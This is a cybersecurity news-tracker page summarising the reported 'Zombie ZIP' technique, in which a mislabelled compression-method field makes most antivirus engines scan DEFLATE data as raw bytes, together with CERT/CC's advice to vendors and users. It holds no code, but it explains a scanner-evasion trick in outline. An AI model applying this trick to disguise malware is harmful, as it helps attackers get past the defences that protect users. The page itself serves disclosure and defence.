CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Zombie ZIP Technique Bypasses Security Tools

First reported
Last updated
1 unique sources, 1 articles

Summary

Hide ▲

A new technique called 'Zombie ZIP' allows malware to evade detection by security tools by manipulating ZIP file headers. The method tricks security solutions into scanning compressed data as uncompressed, hiding the payload. The technique works against 50 out of 51 antivirus engines on VirusTotal. A proof-of-concept (PoC) has been published, and CERT/CC has issued a bulletin warning about the risks. The issue is similar to a vulnerability disclosed in 2004. The technique involves setting the ZIP Method field to STORED (Method=0), causing security tools to scan the data as raw uncompressed bytes. However, the data is actually DEFLATE compressed, making the scanner see compressed noise and miss malware signatures. A custom loader can ignore the header and decompress the data correctly. CERT/CC recommends that security tool vendors validate compression method fields, detect inconsistencies in archive structure, and implement more aggressive archive inspection modes. Users are advised to be cautious with archive files, especially from unknown sources.

Timeline

  1. 10.03.2026 22:05 1 articles · 15h ago

    Zombie ZIP Technique Bypasses Security Tools

    A new technique called 'Zombie ZIP' allows malware to evade detection by security tools by manipulating ZIP file headers. The method tricks security solutions into scanning compressed data as uncompressed, hiding the payload. The technique works against 50 out of 51 antivirus engines on VirusTotal. A proof-of-concept (PoC) has been published, and CERT/CC has issued a bulletin warning about the risks. The issue is similar to a vulnerability disclosed in 2004. The technique involves setting the ZIP Method field to STORED (Method=0), causing security tools to scan the data as raw uncompressed bytes. However, the data is actually DEFLATE compressed, making the scanner see compressed noise and miss malware signatures. A custom loader can ignore the header and decompress the data correctly. CERT/CC recommends that security tool vendors validate compression method fields, detect inconsistencies in archive structure, and implement more aggressive archive inspection modes. Users are advised to be cautious with archive files, especially from unknown sources.

    Show sources
    Open in new tab

Information Snippets